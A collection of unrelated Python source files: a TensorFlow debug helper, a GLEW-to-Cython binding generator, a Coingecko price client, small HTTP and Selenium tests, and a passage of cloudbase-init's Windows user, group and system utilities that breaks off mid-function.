debug_print("see tensors %s for %s", tensorlist, [1,2,3])
"""
if DEBUG_LOGGING:
formatted_args = [format_ops(arg) for arg in args]
print("DEBUG "+s % tuple(formatted_args))
def format_ops(ops, sort_outputs=True):
"""Helper method for printing ops. Converts Tensor/Operation op to op.name,
rest to str(op)."""
if hasattr(ops, '__iter__') and not isinstance(ops, str):
l = [(op.name if hasattr(op, "name") else str(op)) for op in ops]
if sort_outputs:
return sorted(l)
return l
else:
return ops.name if hasattr(ops, "name") else str(ops)
def my_add_control_inputs(wait_to_do_ops, inputs_to_do_before):
for op in wait_to_do_ops:
ci = [i for i in inputs_to_do_before if op.control_inputs is None or i not in op.control_inputs]
ge.add_control_inputs(op, ci)
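# Hedged usage sketch (not part of the original module), following the
# capture_ops() docstring: the op names are hypothetical and TensorFlow 1.x
# graph mode is assumed.
def _capture_ops_example():
    with capture_ops() as ops:
        a = tf.constant(1.0, name="cap_a")
        b = tf.constant(2.0, name="cap_b")
        tf.add(a, b, name="cap_sum")
    # `ops` now holds the three ops created inside the block; with
    # DEBUG_LOGGING set to True, debug_print("captured %s", ops) would log
    # them by name via format_ops().
    return format_ops(ops)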
|
"""
Script taken from: https://github.com/orlp/pygrafix
Appropriate Licence applies!
"""
import argparse
import os
import pathlib
import re
def generate_pxd(glew_header_loc, dest="."):
with open(glew_header_loc) as fin:
data = fin.read()
# cython doesn't support const
data = re.sub(r"\bconst\b", "", data)
lines = data.split("\n")
handled_lines = set()
function_types = {}
export_functions = {}
function_defs = []
enums = []
# read in function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"typedef\s+([^(]+)\([^*]+\*\s*([a-zA-Z_][a-zA-Z0-9_]+)\)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_types[result[1]] = (result[0].strip(), result[2])
handled_lines.add(linenr)
# read in exported functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLEW_FUN_EXPORT\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+([a-zA-Z_][a-zA-Z0-9_]+)",
line,
)[0]
except IndexError:
continue
export_functions[result[1]] = result[0]
handled_lines.add(linenr)
# match exported functions with function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_FUN\s*\(\s*([a-zA-Z_][a-zA-Z0-9_]+)\s*\)",
line,
)[0]
except IndexError:
continue
export_func = export_functions[result[1]]
function_defs.append(
function_types[export_func][0]
+ " "
+ result[0]
+ function_types[export_func][1]
)
handled_lines.add(linenr)
# add GLAPIENTRY functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLAPI\s+([a-zA-Z_][a-zA-Z0-9_]+)[^a-zA-Z_]+GLAPIENTRY[^a-zA-Z_]+([a-zA-Z_][a-zA-Z0-9_]+)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_defs.append(" ".join(result))
handled_lines.add(linenr)
# read in numeric defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+(?:(?:0x[0-9a-fA-F]+)|[0-9]+)",
line,
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# read in GLEW vars as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_VAR\(.+\)", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# also accept GL to GL defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+(GL_[a-zA-Z0-9_]+)\s+GL_[a-zA-Z0-9_]+", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
pxdheader = """# cython: language_level=3
from libc.stdint cimport int64_t, uint64_t
cdef extern from "include_glew.h":
ctypedef struct _cl_context:
pass
ctypedef struct _cl_event:
pass
ctypedef struct __GLsync:
pass
ctypedef unsigned short wchar_t
ctypedef int ptrdiff_t
ctypedef unsigned int GLenum
ctypedef unsigned int GLbitfield
ctypedef unsigned int GLuint
ctypedef int GLint
ctypedef int GLsizei
ctypedef char GLchar
ctypedef unsigned char GLboolean
ctypedef signed char GLbyte
ctypedef short GLshort
ctypedef unsigned char GLubyte
ctypedef unsigned short GLushort
ctypedef unsigned long GLulong
ctypedef float GLfloat
ctypedef float GLclampf
ctypedef double GLdouble
ctypedef double GLclampd
ctypedef int GLfixed
ctypedef int GLclampx
ctypedef void GLvoid
ctypedef int64_t GLint64EXT
ctypedef uint64_t GLuint64EXT
ctypedef GLint64EXT GLint64
ctypedef GLuint64EXT GLuint64
ctypedef __GLsync *GLsync
ctypedef char GLcharARB
ctypedef ptrdiff_t GLintptr
ctypedef ptrdiff_t GLsizeiptr
ctypedef _cl_context *cl_context
ctypedef _cl_event *cl_event
ctypedef unsigned int GLhandleARB
ctypedef ptrdiff_t GLintptrARB
ctypedef ptrdiff_t GLsizeiptrARB
ctypedef void* GLeglClientBufferEXT
ctypedef unsigned short GLhalf
ctypedef GLintptr GLvdpauSurfaceNV
ctypedef long GLVULKANPROCNV
ctypedef void *GLeglImageOES # GL_EXT_EGL_image_storage
ctypedef void (__stdcall *GLDEBUGPROCAMD)(GLuint id, GLenum category, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROCARB)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROC)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, const GLchar* message, GLvoid* userParam)
ctypedef void (__stdcall *GLLOGPROCREGAL)(GLenum stream, GLsizei length, const GLchar *message, GLvoid *context)
GLenum glewInit()
GLboolean glewIsSupported(char *name)
GLboolean glewIsExtensionSupported(char *name)
GLboolean glewGetExtension(char* name)
GLubyte *glewGetErrorString(GLenum error)
GLubyte *glewGetString(GLenum name)
"""
dest = pathlib.Path(dest)
dest.mkdir(exist_ok=True, parents=True)
with (dest / "glew.pxd").open("w") as fout:
data = pxdheader
data += " enum:\n"
data += "\n".join(" " + enum for enum in set(enums))
data += "\n\n"
def mod_func(func):
keywords = [
"and",
"del",
"for",
"is",
"raise",
"assert",
"elif",
"from",
"lambda",
"return",
"break",
"else",
"global",
"not",
"try",
"class",
"except",
"if",
"or",
"while",
"continue",
"exec",
"import",
"pass",
"yield",
"def",
"finally",
"in",
"print",
]
# beautify functions
func = re.sub(r"\s+", " ", func) # collapse whitespace
func = re.sub(r"\s*([()])\s*", r"\1", func) # no whitespace near brackets
func = re.sub(r"\s*,\s*", r", ", func) # only whitespace __after__ comma
func = re.sub(
r"\s*(\*+)\s*", r" \1", func
) # beautify pointers in functions
# cython doesn't support (void), need to do () for no arguments instead
func = re.sub(r"\(void\)", "()", func)
# append an underscore to identifiers that clash with Python keywords
for keyword in keywords:
func = re.sub(r"\b%s\b" % keyword, keyword + "_", func)
return func
data += "\n".join(" " + mod_func(func) for func in function_defs)
fout.write(data)
with (dest / "unhandled_glew.h").open("w") as fout:
data = "\n".join(
lines[linenr] for linenr in range(len(lines)) if linenr not in handled_lines
)
data = re.sub("\n\n+", "\n", data)
fout.write(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("glew_header_loc")
parser.add_argument("destination")
args = parser.parse_args()
generate_pxd(args.glew_header_loc, dest=args.destination)
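# Illustrative note (not part of the upstream script): for a hypothetical
# glew.h excerpt such as
#   typedef void (GLAPIENTRY * PFNGLBINDBUFFERPROC) (GLenum target, GLuint buffer);
#   GLEW_FUN_EXPORT PFNGLBINDBUFFERPROC __glewBindBuffer;
#   #define glBindBuffer GLEW_GET_FUN(__glewBindBuffer)
# the first three regex passes above combine into the declaration
#   void glBindBuffer(GLenum target, GLuint buffer)
# which mod_func() normalises before it is written to glew.pxd. A typical
# invocation (script and header paths are hypothetical):
#   python generate_pxd.py /usr/include/GL/glew.h ./generated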
|
import logging
from urllib.parse import urljoin
import requests
from eth_typing import ChecksumAddress
from safe_transaction_service.tokens.clients.exceptions import CannotGetPrice
logger = logging.getLogger(__name__)
class CoingeckoClient:
base_url = 'https://api.coingecko.com/'
def __init__(self):
self.http_session = requests.Session()
def _get_price(self, url: str, name: str):
try:
response = self.http_session.get(url, timeout=10)
if not response.ok:
raise CannotGetPrice
# Result is returned with lowercased `token_address`
price = response.json().get(name)
if price and price.get('usd'):
return price['usd']
else:
raise CannotGetPrice(f'Price from url={url} is {price}')
except (ValueError, IOError) as e:
logger.warning('Problem getting usd value on coingecko for token-name=%s', name)
raise CannotGetPrice from e
def get_price(self, name: str) -> float:
"""
:param name: Coingecko coin id (e.g. 'energy-web-token')
:return: USD price for the coin; raises CannotGetPrice if it cannot be retrieved
"""
name = name.lower()
url = urljoin(self.base_url,
f'/api/v3/simple/price?ids={name}&vs_currencies=usd')
return self._get_price(url, name)
def get_token_price(self, token_address: ChecksumAddress) -> float:
"""
:param token_address:
:return: USD price for the token address; raises CannotGetPrice if it cannot be retrieved
"""
token_address = token_address.lower()
url = urljoin(self.base_url,
f'api/v3/simple/token_price/ethereum?contract_addresses={token_address}&vs_currencies=usd')
return self._get_price(url, token_address)
def get_ewt_usd_price(self) -> float:
return self.get_price('energy-web-token')
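# Hedged usage sketch (not part of the original client). The calls perform
# live HTTP requests against the Coingecko API; the token address below is
# only an example value (DAI).
def _coingecko_usage_example():
    client = CoingeckoClient()
    ether_usd = client.get_price('ethereum')  # look up by Coingecko coin id
    dai_usd = client.get_token_price('0x6B175474E89094C44Da98b954EedeAC495271d0F')
    return ether_usd, dai_usd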
|
# -*- coding: utf-8 -*-
from selenium_tests.UserDriverTest import UserDriverTest
from selenium.webdriver.common.by import By
class TestHideApplication(UserDriverTest):
def test_hide_application(self):
self.wait_until_application_list_loaded()
self.type_text_in_element_located(By.ID, "search-input", "foobarheho")
self.wait_until_text_inside_element_located(By.ID, "applistentries", "")
|
import anachronos
from e2e_test.runner import http
class ExceptionResourceTest(anachronos.TestCase):
def setUp(self):
self.http = http.with_path("/api/error")
def test_got500OnInternalServerError(self):
response = self.http.get("")
self.assertEqual(500, response.status_code)
def test_got404OnResourceNotFound(self):
response = self.http.get("/inexistent-path")
self.assertEqual(404, response.status_code)
def test_got405MethodNotAllowed(self):
response = self.http.post("")
self.assertEqual(405, response.status_code)
def test_givenNullPointerException_thenReturn500InternalServerError(self):
response = self.http.get("/none")
self.assertEqual(500, response.status_code)
if __name__ == '__main__':
anachronos.run_tests()
|
from st_library import Library
st_lib = Library()
st_lib.set_token('token')
st_lib.set_config_id('52db99d3-edfb-44c5-b97a-f09df4402081')
print(st_lib.unstruct_data.download_file("19a29b9b-bea2-40fb-89c4-555bba829539","image.jpg"))
|
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import ctypes
from ctypes import wintypes
import os
import re
import struct
import subprocess
import time
import netaddr
from oslo_log import log as oslo_logging
import pywintypes
import six
from six.moves import winreg
from tzlocal import windows_tz
import win32api
from win32com import client
import win32net
import win32netcon
import win32process
import win32security
import win32service
import winerror
from cloudbaseinit import constant
from cloudbaseinit import exception
from cloudbaseinit.osutils import base
from cloudbaseinit.utils import classloader
from cloudbaseinit.utils import retry_decorator
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import network
from cloudbaseinit.utils.windows import privilege
from cloudbaseinit.utils.windows import timezone
from cloudbaseinit.utils.windows import wmi_loader
wmi = wmi_loader.wmi()
LOG = oslo_logging.getLogger(__name__)
AF_INET = 2
AF_INET6 = 23
UNICAST = 1
MANUAL = 1
PREFERRED_ADDR = 4
advapi32 = ctypes.windll.advapi32
kernel32 = ctypes.windll.kernel32
netapi32 = ctypes.windll.netapi32
userenv = ctypes.windll.userenv
iphlpapi = ctypes.windll.iphlpapi
Ws2_32 = ctypes.windll.Ws2_32
setupapi = ctypes.windll.setupapi
msvcrt = ctypes.cdll.msvcrt
ntdll = ctypes.windll.ntdll
secur32 = ctypes.windll.secur32
class Win32_PROFILEINFO(ctypes.Structure):
_fields_ = [
('dwSize', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('lpUserName', wintypes.LPWSTR),
('lpProfilePath', wintypes.LPWSTR),
('lpDefaultPath', wintypes.LPWSTR),
('lpServerName', wintypes.LPWSTR),
('lpPolicyPath', wintypes.LPWSTR),
('hprofile', wintypes.HANDLE)
]
class Win32_LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
_fields_ = [
('lgrmi3_domainandname', wintypes.LPWSTR)
]
class Win32_MIB_IPFORWARDROW(ctypes.Structure):
_fields_ = [
('dwForwardDest', wintypes.DWORD),
('dwForwardMask', wintypes.DWORD),
('dwForwardPolicy', wintypes.DWORD),
('dwForwardNextHop', wintypes.DWORD),
('dwForwardIfIndex', wintypes.DWORD),
('dwForwardType', wintypes.DWORD),
('dwForwardProto', wintypes.DWORD),
('dwForwardAge', wintypes.DWORD),
('dwForwardNextHopAS', wintypes.DWORD),
('dwForwardMetric1', wintypes.DWORD),
('dwForwardMetric2', wintypes.DWORD),
('dwForwardMetric3', wintypes.DWORD),
('dwForwardMetric4', wintypes.DWORD),
('dwForwardMetric5', wintypes.DWORD)
]
class Win32_MIB_IPFORWARDTABLE(ctypes.Structure):
_fields_ = [
('dwNumEntries', wintypes.DWORD),
('table', Win32_MIB_IPFORWARDROW * 1)
]
class Win32_OSVERSIONINFOEX_W(ctypes.Structure):
_fields_ = [
('dwOSVersionInfoSize', wintypes.DWORD),
('dwMajorVersion', wintypes.DWORD),
('dwMinorVersion', wintypes.DWORD),
('dwBuildNumber', wintypes.DWORD),
('dwPlatformId', wintypes.DWORD),
('szCSDVersion', wintypes.WCHAR * 128),
('wServicePackMajor', wintypes.WORD),
('wServicePackMinor', wintypes.WORD),
('wSuiteMask', wintypes.WORD),
('wProductType', wintypes.BYTE),
('wReserved', wintypes.BYTE)
]
class Win32_SP_DEVICE_INTERFACE_DATA(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('InterfaceClassGuid', disk.GUID),
('Flags', wintypes.DWORD),
('Reserved', ctypes.POINTER(wintypes.ULONG))
]
class Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('DevicePath', ctypes.c_byte * 2)
]
class Win32_STORAGE_DEVICE_NUMBER(ctypes.Structure):
_fields_ = [
('DeviceType', wintypes.DWORD),
('DeviceNumber', wintypes.DWORD),
('PartitionNumber', wintypes.DWORD)
]
class Win32_STARTUPINFO_W(ctypes.Structure):
_fields_ = [
('cb', wintypes.DWORD),
('lpReserved', wintypes.LPWSTR),
('lpDesktop', wintypes.LPWSTR),
('lpTitle', wintypes.LPWSTR),
('dwX', wintypes.DWORD),
('dwY', wintypes.DWORD),
('dwXSize', wintypes.DWORD),
('dwYSize', wintypes.DWORD),
('dwXCountChars', wintypes.DWORD),
('dwYCountChars', wintypes.DWORD),
('dwFillAttribute', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('wShowWindow', wintypes.WORD),
('cbReserved2', wintypes.WORD),
('lpReserved2', ctypes.POINTER(wintypes.BYTE)),
('hStdInput', wintypes.HANDLE),
('hStdOutput', wintypes.HANDLE),
('hStdError', wintypes.HANDLE),
]
class Win32_PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', wintypes.HANDLE),
('hThread', wintypes.HANDLE),
('dwProcessId', wintypes.DWORD),
('dwThreadId', wintypes.DWORD),
]
advapi32.CreateProcessAsUserW.argtypes = [wintypes.HANDLE,
wintypes.LPCWSTR,
wintypes.LPWSTR,
ctypes.c_void_p,
ctypes.c_void_p,
wintypes.BOOL,
wintypes.DWORD,
ctypes.c_void_p,
wintypes.LPCWSTR,
ctypes.POINTER(
Win32_STARTUPINFO_W),
ctypes.POINTER(
Win32_PROCESS_INFORMATION)]
advapi32.CreateProcessAsUserW.restype = wintypes.BOOL
msvcrt.malloc.argtypes = [ctypes.c_size_t]
msvcrt.malloc.restype = ctypes.c_void_p
msvcrt.free.argtypes = [ctypes.c_void_p]
msvcrt.free.restype = None
ntdll.RtlGetVersion.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W)]
ntdll.RtlGetVersion.restype = wintypes.DWORD
ntdll.RtlVerifyVersionInfo.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W),
wintypes.DWORD, wintypes.ULARGE_INTEGER]
ntdll.RtlVerifyVersionInfo.restype = wintypes.DWORD
kernel32.VerSetConditionMask.argtypes = [wintypes.ULARGE_INTEGER,
wintypes.DWORD,
wintypes.BYTE]
kernel32.VerSetConditionMask.restype = wintypes.ULARGE_INTEGER
kernel32.SetComputerNameExW.argtypes = [ctypes.c_int, wintypes.LPCWSTR]
kernel32.SetComputerNameExW.restype = wintypes.BOOL
kernel32.GetLogicalDriveStringsW.argtypes = [wintypes.DWORD, wintypes.LPWSTR]
kernel32.GetLogicalDriveStringsW.restype = wintypes.DWORD
kernel32.GetDriveTypeW.argtypes = [wintypes.LPCWSTR]
kernel32.GetDriveTypeW.restype = wintypes.UINT
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD,
wintypes.DWORD, wintypes.LPVOID,
wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
kernel32.GetProcessHeap.argtypes = []
kernel32.GetProcessHeap.restype = wintypes.HANDLE
kernel32.HeapAlloc.argtypes = [wintypes.HANDLE, wintypes.DWORD,
ctypes.c_size_t]
kernel32.HeapAlloc.restype = wintypes.LPVOID
kernel32.HeapFree.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID]
kernel32.HeapFree.restype = wintypes.BOOL
kernel32.GetVolumeNameForVolumeMountPointW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.GetVolumeNameForVolumeMountPointW.restype = wintypes.BOOL
kernel32.GetVolumePathNamesForVolumeNameW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD,
ctypes.POINTER(
wintypes.DWORD)]
kernel32.GetVolumePathNamesForVolumeNameW.restype = wintypes.BOOL
kernel32.FindFirstVolumeW.argtypes = [wintypes.LPWSTR, wintypes.DWORD]
kernel32.FindFirstVolumeW.restype = wintypes.HANDLE
kernel32.FindNextVolumeW.argtypes = [wintypes.HANDLE,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.FindNextVolumeW.restype = wintypes.BOOL
kernel32.FindVolumeClose.argtypes = [wintypes.HANDLE]
kernel32.FindVolumeClose.restype = wintypes.BOOL
iphlpapi.GetIpForwardTable.argtypes = [
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE),
ctypes.POINTER(wintypes.ULONG),
wintypes.BOOL]
iphlpapi.GetIpForwardTable.restype = wintypes.DWORD
Ws2_32.inet_ntoa.restype = ctypes.c_char_p
secur32.GetUserNameExW.argtypes = [wintypes.DWORD,
wintypes.LPWSTR,
ctypes.POINTER(wintypes.ULONG)]
secur32.GetUserNameExW.restype = wintypes.BOOL
setupapi.SetupDiGetClassDevsW.argtypes = [ctypes.POINTER(disk.GUID),
wintypes.LPCWSTR,
wintypes.HANDLE,
wintypes.DWORD]
setupapi.SetupDiGetClassDevsW.restype = wintypes.HANDLE
setupapi.SetupDiEnumDeviceInterfaces.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
ctypes.POINTER(disk.GUID),
wintypes.DWORD,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA)]
setupapi.SetupDiEnumDeviceInterfaces.restype = wintypes.BOOL
setupapi.SetupDiGetDeviceInterfaceDetailW.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W),
wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
setupapi.SetupDiGetDeviceInterfaceDetailW.restype = wintypes.BOOL
setupapi.SetupDiDestroyDeviceInfoList.argtypes = [wintypes.HANDLE]
setupapi.SetupDiDestroyDeviceInfoList.restype = wintypes.BOOL
VER_MAJORVERSION = 1
VER_MINORVERSION = 2
VER_BUILDNUMBER = 4
VER_GREATER_EQUAL = 3
GUID_DEVINTERFACE_DISK = disk.GUID(0x53f56307, 0xb6bf, 0x11d0, 0x94, 0xf2,
0x00, 0xa0, 0xc9, 0x1e, 0xfb, 0x8b)
class WindowsUtils(base.BaseOSUtils):
NERR_GroupNotFound = 2220
NERR_UserNotFound = 2221
ERROR_PATH_NOT_FOUND = 3
ERROR_ACCESS_DENIED = 5
ERROR_INSUFFICIENT_BUFFER = 122
ERROR_INVALID_NAME = 123
ERROR_NO_DATA = 232
ERROR_MORE_DATA = 234
ERROR_NO_SUCH_MEMBER = 1387
ERROR_MEMBER_IN_ALIAS = 1378
ERROR_INVALID_MEMBER = 1388
ERROR_NO_MORE_FILES = 18
STATUS_REVISION_MISMATCH = 0xC0000059
ADS_UF_PASSWORD_EXPIRED = 0x800000
PASSWORD_CHANGED_FLAG = 1
INVALID_HANDLE_VALUE = 0xFFFFFFFF
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
IOCTL_STORAGE_GET_DEVICE_NUMBER = 0x002D1080
MAX_PATH = 260
DIGCF_PRESENT = 2
DIGCF_DEVICEINTERFACE = 0x10
DRIVE_CDROM = 5
INFINITE = 0xFFFFFFFF
CREATE_NEW_CONSOLE = 0x10
LOGON32_LOGON_BATCH = 4
LOGON32_LOGON_INTERACTIVE = 2
LOGON32_LOGON_SERVICE = 5
LOGON32_PROVIDER_DEFAULT = 0
EXTENDED_NAME_FORMAT_SAM_COMPATIBLE = 2
SERVICE_STATUS_STOPPED = "Stopped"
SERVICE_STATUS_START_PENDING = "Start Pending"
SERVICE_STATUS_STOP_PENDING = "Stop Pending"
SERVICE_STATUS_RUNNING = "Running"
SERVICE_STATUS_CONTINUE_PENDING = "Continue Pending"
SERVICE_STATUS_PAUSE_PENDING = "Pause Pending"
SERVICE_STATUS_PAUSED = "Paused"
SERVICE_STATUS_UNKNOWN = "Unknown"
SERVICE_START_MODE_AUTOMATIC = "Automatic"
SERVICE_START_MODE_MANUAL = "Manual"
SERVICE_START_MODE_DISABLED = "Disabled"
_SERVICE_START_TYPE_MAP = {
SERVICE_START_MODE_AUTOMATIC:
win32service.SERVICE_AUTO_START,
SERVICE_START_MODE_MANUAL:
win32service.SERVICE_DEMAND_START,
SERVICE_START_MODE_DISABLED:
win32service.SERVICE_DISABLED}
_SERVICE_STATUS_MAP = {
win32service.SERVICE_CONTINUE_PENDING:
SERVICE_STATUS_CONTINUE_PENDING,
win32service.SERVICE_PAUSE_PENDING:
SERVICE_STATUS_PAUSE_PENDING,
win32service.SERVICE_PAUSED:
SERVICE_STATUS_PAUSED,
win32service.SERVICE_RUNNING:
SERVICE_STATUS_RUNNING,
win32service.SERVICE_START_PENDING:
SERVICE_STATUS_START_PENDING,
win32service.SERVICE_STOP_PENDING:
SERVICE_STATUS_STOP_PENDING,
win32service.SERVICE_STOPPED:
SERVICE_STATUS_STOPPED,
}
ComputerNamePhysicalDnsHostname = 5
_config_key = 'SOFTWARE\\Cloudbase Solutions\\Cloudbase-Init\\'
_service_name = 'cloudbase-init'
_FW_IP_PROTOCOL_TCP = 6
_FW_IP_PROTOCOL_UDP = 17
_FW_SCOPE_ALL = 0
_FW_SCOPE_LOCAL_SUBNET = 1
VER_NT_WORKSTATION = 1
def __init__(self):
self._network_team_manager = None
def reboot(self):
with privilege.acquire_privilege(win32security.SE_SHUTDOWN_NAME):
ret_val = advapi32.InitiateSystemShutdownExW(
0, "Cloudbase-Init reboot",
0, True, True, 0)
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Reboot failed: %r")
def user_exists(self, username):
try:
self._get_user_info(username, 1)
return True
except exception.ItemNotFoundException:
# User not found
return False
def create_user(self, username, password, password_expires=False):
user_info = {
"name": username,
"password": password,
"priv": win32netcon.USER_PRIV_USER,
"flags": win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT,
}
if not password_expires:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserAdd(None, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create user failed: %s" % ex.args[2])
def rename_user(self, username, new_username):
user_info = {
"name": new_username,
}
try:
win32net.NetUserSetInfo(None, username, 0, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Renaming user failed: %s" % ex.args[2])
def set_user_info(self, username, full_name=None,
disabled=False, expire_interval=None):
user_info = self._get_user_info(username, 2)
if full_name:
user_info["full_name"] = full_name
if disabled:
user_info["flags"] |= win32netcon.UF_ACCOUNTDISABLE
else:
user_info["flags"] &= ~win32netcon.UF_ACCOUNTDISABLE
if expire_interval is not None:
user_info["acct_expires"] = int(expire_interval)
else:
user_info["acct_expires"] = win32netcon.TIMEQ_FOREVER
try:
win32net.NetUserSetInfo(None, username, 2, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
LOG.debug(ex)
raise exception.CloudbaseInitException(
"Setting user info failed: %s" % ex.args[2])
def enum_users(self):
usernames = []
resume_handle = 0
while True:
try:
users_info, total, resume_handle = win32net.NetUserEnum(
None, 0, win32netcon.FILTER_NORMAL_ACCOUNT, resume_handle)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Enumerating users failed: %s" % ex.args[2])
usernames += [u["name"] for u in users_info]
if not resume_handle:
return usernames
def is_builtin_admin(self, username):
sid = self.get_user_sid(username)
return sid and sid.startswith(u"S-1-5-") and sid.endswith(u"-500")
def _get_user_info(self, username, level):
try:
return win32net.NetUserGetInfo(None, username, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Failed to get user info: %s" % ex.args[2])
def set_user_password(self, username, password, password_expires=False):
user_info = self._get_user_info(username, 1)
user_info["password"] = password
if password_expires:
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
else:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserSetInfo(None, username, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Set user password failed: %s" % ex.args[2])
def change_password_next_logon(self, username):
"""Force the given user to change the password at next logon."""
user_info = self._get_user_info(username, 4)
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
user_info["password_expired"] = 1
try:
win32net.NetUserSetInfo(None, username, 4, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Setting password expiration failed: %s" % ex.args[2])
def group_exists(self, group):
try:
self._get_group_info(group, 1)
return True
except exception.ItemNotFoundException:
# Group not found
return False
def _get_group_info(self, group, level):
try:
return win32net.NetLocalGroupGetInfo(None, group, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_GroupNotFound:
raise exception.ItemNotFoundException(
"Group not found: %s" % group)
else:
raise exception.CloudbaseInitException(
"Failed to get group info: %s" % ex.args[2])
def create_group(self, group, description=None):
group_info = {"name": group}
try:
win32net.NetLocalGroupAdd(None, 0, group_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create group failed: %s" % ex.args[2])
@staticmethod
def _get_cch_referenced_domain_name(domain_name):
return wintypes.DWORD(
ctypes.sizeof(domain_name) // ctypes.sizeof(wintypes.WCHAR))
def _get_user_sid_and_domain(self, username):
sid = ctypes.create_string_buffer(1024)
cbSid = wintypes.DWORD(ctypes.sizeof(sid))
domainName = ctypes.create_unicode_buffer(1024)
cchReferencedDomainName = self._get_cch_referenced_domain_name(
domainName)
sidNameUse = wintypes.DWORD()
ret_val = advapi32.LookupAccountNameW(
0, six.text_type(username), sid, ctypes.byref(cbSid), domainName,
ctypes.byref(cchReferencedDomainName), ctypes.byref(sidNameUse))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot get user SID: %r")
return sid, domainName.value
def add_user_to_local_group(self, username, groupname):
lmi = Win32_LOCALGROUP_MEMBERS_INFO_3()
lmi.lgrmi3_domainandname = six.text_type(username)
ret_val = netapi32.NetLocalGroupAddMembers(0, six.text_type(groupname),
3, ctypes.pointer(lmi), 1)
if ret_val == self.NERR_GroupNotFound:
raise exception.CloudbaseInitException("Group '%s' not found"
% groupname)
elif ret_val == self.ERROR_ACCESS_DENIED:
raise exception.CloudbaseInitException('Access denied')
elif ret_val == self.ERROR_NO_SUCH_MEMBER:
raise exception.CloudbaseInitException("Username '%s' not found"
% username)
elif ret_val == self.ERROR_MEMBER_IN_ALIAS:
# The user is already a member of the group
pass
elif ret_val == self.ERROR_INVALID_MEMBER:
